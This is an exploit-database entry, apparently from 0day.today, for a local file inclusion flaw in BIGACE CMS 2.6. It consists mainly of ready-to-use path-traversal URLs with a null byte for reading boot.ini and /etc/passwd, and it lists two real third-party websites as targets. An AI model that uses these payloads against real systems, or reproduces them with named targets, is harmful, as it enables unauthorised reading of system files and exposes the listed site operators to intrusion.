BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability

2009-06-30T00:00:00
ID 1337DAY-ID-5438
Type zdt
Reporter [email protected]
Modified 2009-06-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
=======================================================


-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************




#  0day.today [2018-03-09]  #